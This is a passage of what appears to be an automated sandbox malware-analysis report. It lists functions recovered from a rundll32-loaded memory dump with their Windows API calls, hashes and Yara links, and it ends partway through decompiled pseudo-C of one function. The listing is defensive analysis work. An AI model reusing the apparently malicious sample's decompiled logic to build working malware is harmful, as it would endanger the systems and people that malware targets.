                                                          Uniqueness Score: -1.00%

                                                          Function 0628FE94 Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcmpi.KERNEL32(00000000,?), ref: 0628FEC3
                                                          • RtlEnterCriticalSection.NTDLL(0629A428), ref: 0628FED0
                                                          • RtlLeaveCriticalSection.NTDLL(0629A428), ref: 0628FEE3
                                                          • lstrcmpi.KERNEL32(0629A440,00000000), ref: 0628FF03
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0627404D,00000000), ref: 0628FF17
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                                          • String ID:
                                                          • API String ID: 1266740956-0
                                                          • Opcode ID: d63a575070c2a16e5a761e39e5e0f6b8dc037304184f62a1ab075e69b90a4bc6
                                                          • Instruction ID: 091e62abaef7d16aafb1eed0d5f9ea41a3f1dc66d03c8b56633d5613476e4cb9
                                                          • Opcode Fuzzy Hash: d63a575070c2a16e5a761e39e5e0f6b8dc037304184f62a1ab075e69b90a4bc6
                                                          • Instruction Fuzzy Hash: 0E117F32921306AFDB45DB58E84DA99B7E9FB99328F144055ED0997280D7349D01CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06273263 Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000000,06293716,00000000,06282466,?,?,?,06288A07,?,?,?,00000000,00000001,00000000,?), ref: 0627326D
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 06273291
                                                          • StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,06288A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 06273298
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 062732E0
                                                          • lstrcat.KERNEL32(00000000,?), ref: 062732EF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                                                          • String ID:
                                                          • API String ID: 2616531654-0
                                                          • Opcode ID: dbfd3582f809a5d739546aa672fb49b85c669ecc842cf94a11260e786bcb33a1
                                                          • Instruction ID: e64f1563530d317461424ee925709cac91e7b2569eafc596eadaabd71d4da029
                                                          • Opcode Fuzzy Hash: dbfd3582f809a5d739546aa672fb49b85c669ecc842cf94a11260e786bcb33a1
                                                          • Instruction Fuzzy Hash: 9211A072610307ABD761DA69EC8CF6BB7EDABC9210F080029FA05D3540EB34D945DBB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628E3CD Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0628D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,0627243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0628D58C
                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0628E3F6
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0628E409
                                                          • RtlEnterCriticalSection.NTDLL(0629A428), ref: 0628E41A
                                                          • RtlLeaveCriticalSection.NTDLL(0629A428), ref: 0628E42F
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0628E467
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 2349942465-0
                                                          • Opcode ID: 74313821edc8ee6e6160d5d052f4d7f3e12e14323ceaf5d8ba1da48f2c5deee3
                                                          • Instruction ID: e83b48718d5cde9f7299f7f721e35e638e2275c7567bc26eeb09bcc0a2c78967
                                                          • Opcode Fuzzy Hash: 74313821edc8ee6e6160d5d052f4d7f3e12e14323ceaf5d8ba1da48f2c5deee3
                                                          • Instruction Fuzzy Hash: 13110272222310AFC7512F24EC4CC2B77EAEBC9325701412AFE5993240DA315C04CEB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06284D17 Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(0627C1F8,00000000,00000000,00000000,?,06280FD9,?,0627C1F8,00000000), ref: 06284D2D
                                                          • lstrlen.KERNEL32(?,?,06280FD9,?,0627C1F8,00000000), ref: 06284D34
                                                          • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 06284D42
                                                            • Part of subcall function 0627EEF2: GetLocalTime.KERNEL32(?,?,?,?,0628FC9E,00000000,00000001), ref: 0627EEFC
                                                            • Part of subcall function 0627EEF2: wsprintfA.USER32 ref: 0627EF2F
                                                          • wsprintfA.USER32 ref: 06284D64
                                                            • Part of subcall function 0627ED48: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,06284D8C,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0627ED66
                                                            • Part of subcall function 0627ED48: wsprintfA.USER32 ref: 0627ED8B
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 06284D95
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                                          • String ID:
                                                          • API String ID: 3847261958-0
                                                          • Opcode ID: fbe2d77a77aa61215b8f000a3f550c752809dc4a2699567f0decf6ceddf832a1
                                                          • Instruction ID: b1f61306be93e0eb8c70df9a0b6977888c5730e5bf65655b52eeda380416f083
                                                          • Opcode Fuzzy Hash: fbe2d77a77aa61215b8f000a3f550c752809dc4a2699567f0decf6ceddf832a1
                                                          • Instruction Fuzzy Hash: B3018831501319BFDB512F16EC48E9A7F6EEFC4364F048011FE1896151D6329965DFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628DCF6 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,0627DBAC,?,?,00000000,06273EC6,?,00000000), ref: 0628DD35
                                                          • ResetEvent.KERNEL32(?,?,0627DBAC,?,?,00000000,06273EC6,?,00000000), ref: 0628DD3A
                                                          • GetLastError.KERNEL32(0627DBAC,?,?,00000000,06273EC6,?,00000000), ref: 0628DD55
                                                          • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,0627DBAC,?,?,00000000,06273EC6,?,00000000), ref: 0628DD84
                                                            • Part of subcall function 0627D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?,?,00000000), ref: 0627D435
                                                            • Part of subcall function 0627D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?), ref: 0627D493
                                                            • Part of subcall function 0627D429: lstrcpy.KERNEL32(00000000,00000000), ref: 0627D4A3
                                                          • SetEvent.KERNEL32(?,0627DBAC,?,?,00000000,06273EC6,?,00000000), ref: 0628DD76
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: 44140ecd52617cf6b284c8908db266d67bf3371c77543812ecf4d932c5aa659e
                                                          • Instruction ID: 36cea533057e05cb6e79db8942cf0113ba0ecb299e575180712240bb75ec5ba7
                                                          • Opcode Fuzzy Hash: 44140ecd52617cf6b284c8908db266d67bf3371c77543812ecf4d932c5aa659e
                                                          • Instruction Fuzzy Hash: 0A115172521606AFDB617F65EC48A9B3BA9EF48364F104A20FD15914E0C731D855DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06290A9D Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 06290AB4
                                                            • Part of subcall function 0628EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0628EC20
                                                            • Part of subcall function 0628EC09: SetEvent.KERNEL32(?,?,?,?,06273EC6,?,?), ref: 0628EC30
                                                          • lstrlen.KERNEL32(?,?,?,?,?,0627859B,?,?), ref: 06290AD7
                                                          • lstrlen.KERNEL32(?,?,?,?,0627859B,?,?), ref: 06290AE1
                                                          • memcpy.NTDLL(?,?,00004000,?,?,0627859B,?,?), ref: 06290AF2
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,0627859B,?,?), ref: 06290B14
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
                                                          • String ID:
                                                          • API String ID: 442095154-0
                                                          • Opcode ID: 77b64abff9f86aea5abcaf5d0851878d1817a31c044e7fa137bb8458469be2ad
                                                          • Instruction ID: 42a2cd721971846c707daa91b10252388b1b379299bf879ed7f0e0cad6acd16a
                                                          • Opcode Fuzzy Hash: 77b64abff9f86aea5abcaf5d0851878d1817a31c044e7fa137bb8458469be2ad
                                                          • Instruction Fuzzy Hash: 26118B75A10209EFCF529F55EC48F5EBBBAEFC9364F204028EA09A3250E6719D04DB70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06287A3E Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0627AE7C: lstrlen.KERNEL32(0627E448,00000000,00000000,?,?,06287A5B,?,?,?,?,0627E448,?), ref: 0627AE8B
                                                            • Part of subcall function 0627AE7C: mbstowcs.NTDLL ref: 0627AEA7
                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0627E448,?), ref: 06287A6A
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06287A7C
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0627E448,?), ref: 06287A99
                                                          • lstrlenW.KERNEL32(00000000,?,?,0627E448,?), ref: 06287AA5
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0627E448,?), ref: 06287AB9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                                                          • String ID:
                                                          • API String ID: 3403466626-0
                                                          • Opcode ID: ac34d4c6d163811c064cb283165b903c3eabfd1c126ec6cf7e3e86adb05143f4
                                                          • Instruction ID: 75942f5de5225b504469ef4879a191fea14f0b1134b7eedfdec644b3b13b190e
                                                          • Opcode Fuzzy Hash: ac34d4c6d163811c064cb283165b903c3eabfd1c126ec6cf7e3e86adb05143f4
                                                          • Instruction Fuzzy Hash: C0012972201304BFD712AF99EC88FAE77AEEB89754F140015FA05AB150D7749904CFB5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627F49F Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32 ref: 0627F4BF
                                                          • GetModuleHandleA.KERNEL32 ref: 0627F4CD
                                                          • LoadLibraryExW.KERNEL32(?,?,?), ref: 0627F4DA
                                                          • GetModuleHandleA.KERNEL32 ref: 0627F4F1
                                                          • GetModuleHandleA.KERNEL32 ref: 0627F4FD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1178273743-0
                                                          • Opcode ID: ef7596608570f42a97afa3c30cf8d6e3e87eb1df80bb90f5abadccb9533efc1b
                                                          • Instruction ID: d7110e201c4f2b6ae275097eb71e244c789b9b65fb6af4d9509fb03ab9f8f16e
                                                          • Opcode Fuzzy Hash: ef7596608570f42a97afa3c30cf8d6e3e87eb1df80bb90f5abadccb9533efc1b
                                                          • Instruction Fuzzy Hash: 6E016D31A24307AB9F415F69FD48E6A7BAAFF85275708403AFE14D2120DB71C821DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06291659 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0629A400), ref: 06291664
                                                          • RtlLeaveCriticalSection.NTDLL(0629A400), ref: 06291675
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,06284B8B,?,?,0629A428,062725BA,00000003), ref: 0629168C
                                                          • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,06284B8B,?,?,0629A428,062725BA,00000003), ref: 062916A6
                                                          • GetLastError.KERNEL32(?,?,06284B8B,?,?,0629A428,062725BA,00000003), ref: 062916B3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                          • String ID:
                                                          • API String ID: 653387826-0
                                                          • Opcode ID: fb8fdae7b2c28c0f11fb6d2e778163344fb6411cff640a3aa7587c27275733a6
                                                          • Instruction ID: 45b8b3185f6cca043b935230df08a32f7d30a91a9d2a30c38d383e1a52674dae
                                                          • Opcode Fuzzy Hash: fb8fdae7b2c28c0f11fb6d2e778163344fb6411cff640a3aa7587c27275733a6
                                                          • Instruction Fuzzy Hash: 0B018F75600305AFD7219F25DC09D6AB7B9EFC8224B214129EA5693250D770E905CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628BDC6 Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,0627396C), ref: 0628BDCC
                                                          • StrTrimA.SHLWAPI(00000001,?,?,0627396C), ref: 0628BDEF
                                                          • StrTrimA.SHLWAPI(00000000,?,?,0627396C), ref: 0628BDFE
                                                          • _strupr.NTDLL ref: 0628BE01
                                                          • lstrlen.KERNEL32(00000000,0627396C), ref: 0628BE09
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Trim$_struprlstrlen
                                                          • String ID:
                                                          • API String ID: 2280331511-0
                                                          • Opcode ID: b6a04071d970be2bf7618d89d0afa7061848703b953ed9a143634c0232f5c37a
                                                          • Instruction ID: a83d82ef76318a9bf0fa864d9d35f67cdcaf7a2a105721dc4c3ffe6cb7c8bfe7
                                                          • Opcode Fuzzy Hash: b6a04071d970be2bf7618d89d0afa7061848703b953ed9a143634c0232f5c37a
                                                          • Instruction Fuzzy Hash: 5BF062717012156FD745AB28FC8CE3F77EEEBCA655B040009FA05CB280DB299C018B70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06280818 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,06282397,?), ref: 06280820
                                                          • GetVersion.KERNEL32 ref: 0628082F
                                                          • GetCurrentProcessId.KERNEL32 ref: 0628084B
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 06280868
                                                          • GetLastError.KERNEL32 ref: 06280887
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: c55d6b5b4fd0f232954f239a0cc037d2ab724ff54fbc3a40d110aafdaa68d99d
                                                          • Instruction ID: 71626d0f7e8de0d8ad8611fa11e563fc4c2362ab4d5b010dc4858cf8080d3104
                                                          • Opcode Fuzzy Hash: c55d6b5b4fd0f232954f239a0cc037d2ab724ff54fbc3a40d110aafdaa68d99d
                                                          • Instruction Fuzzy Hash: 2CF04F70A613029FE766AF64BC1EB153B62BBC6785F100125EB4AD61D0D7708088CFB8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062789EE Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 062789FB
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 06278A0B
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 06278A14
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,06282F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 06278A32
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,06282F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 06278A3F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 3667519916-0
                                                          • Opcode ID: f97b0aaffc116abe96752ee8e80bf67d4a48fbaefbd4a8f95e01cf33d04df0ba
                                                          • Instruction ID: b593a2a05316bd9a15b7f706b29b3c32ca53b386cd52e6feddb4d555d4c1b4a0
                                                          • Opcode Fuzzy Hash: f97b0aaffc116abe96752ee8e80bf67d4a48fbaefbd4a8f95e01cf33d04df0ba
                                                          • Instruction Fuzzy Hash: 52F0BE30701701AFEBA16B35EC4CF1AB3B9BF88255F100624FA41A24D0CB38E805CE71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628C484 Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 0628C4A8
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • wsprintfA.USER32 ref: 0628C4D9
                                                            • Part of subcall function 0627AAAF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0627A1A1), ref: 0627AAC5
                                                            • Part of subcall function 0627AAAF: wsprintfA.USER32 ref: 0627AAED
                                                            • Part of subcall function 0627AAAF: lstrlen.KERNEL32(?), ref: 0627AAFC
                                                            • Part of subcall function 0627AAAF: wsprintfA.USER32 ref: 0627AB3C
                                                            • Part of subcall function 0627AAAF: wsprintfA.USER32 ref: 0627AB71
                                                            • Part of subcall function 0627AAAF: memcpy.NTDLL(00000000,?,?), ref: 0627AB7E
                                                            • Part of subcall function 0627AAAF: memcpy.NTDLL(00000008,062953E8,00000002,00000000,?,?), ref: 0627AB93
                                                            • Part of subcall function 0627AAAF: wsprintfA.USER32 ref: 0627ABB6
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0628C54E
                                                            • Part of subcall function 06292968: RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 0629297E
                                                            • Part of subcall function 06292968: RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 06292999
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 0628C538
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0628C544
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                                          • String ID:
                                                          • API String ID: 3553201432-0
                                                          • Opcode ID: 8ef011cb56e8bb25e6eb58be3e3760970fdcd5afd99266490b07797cc47d4014
                                                          • Instruction ID: 1b3f64c3273632ab0cfd79f65a24519defe467149bf354c25200d59417a92629
                                                          • Opcode Fuzzy Hash: 8ef011cb56e8bb25e6eb58be3e3760970fdcd5afd99266490b07797cc47d4014
                                                          • Instruction Fuzzy Hash: 8C21F872910249AFCF11EFA9EC88DDF7BBAFB88310B004416FA15A6110D7759A64DFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627EF5F Relevance: 6.3, APIs: 5, Instructions: 76memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627EFBC
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627EFCD
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627EFE5
                                                          • CloseHandle.KERNEL32(?), ref: 0627EFFF
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627F014
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap$CloseHandle
                                                          • String ID:
                                                          • API String ID: 1910495013-0
                                                          • Opcode ID: dc4cd6deab95b39e3594ba15adb7b5309bc93e6406d2bbb84d962c60f62342b9
                                                          • Instruction ID: 01ee40b0a3507b324cefa7f878b8cf1f25ed7d9f6fb78689a2facdaefb3384a2
                                                          • Opcode Fuzzy Hash: dc4cd6deab95b39e3594ba15adb7b5309bc93e6406d2bbb84d962c60f62342b9
                                                          • Instruction Fuzzy Hash: 25212C71611622AFC3529B66EC88D1AFBAAFF89B103550454FD48D3A50C731ECA1DBF1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062896EE Relevance: 6.2, APIs: 4, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0627EC00: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0627EC1B
                                                            • Part of subcall function 0627EC00: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0627EC69
                                                            • Part of subcall function 0627EC00: GetProcAddress.KERNEL32(00000000,?), ref: 0627EC82
                                                            • Part of subcall function 0627EC00: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0627ECD3
                                                          • GetLastError.KERNEL32(?,?,00000001), ref: 0628987C
                                                          • FreeLibrary.KERNEL32(?,?,00000001), ref: 062898E4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                                          • String ID:
                                                          • API String ID: 1730969706-0
                                                          • Opcode ID: 67a7dc6d74505c9eaf6c874b214da9191dbfae3f6445b39d2e55573396b6809e
                                                          • Instruction ID: ef0f70e35d9147d90d5085e5d2f590041255574f0565b515dbf348995859d20c
                                                          • Opcode Fuzzy Hash: 67a7dc6d74505c9eaf6c874b214da9191dbfae3f6445b39d2e55573396b6809e
                                                          • Instruction Fuzzy Hash: 7F711E75D1120AEFCF40EFE9CC849ADBBB9FF48344B148569E916A7250D731A981CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D2732 Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 46%
                                                          			E036D2732(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x36da348; // 0x228d5a8
					_t5 = _t103 + 0x36db038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x36d9290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x36da348; // 0x228d5a8
												_t28 = _t109 + 0x36db0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x36da348; // 0x228d5a8
														_t33 = _t79 + 0x36db078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
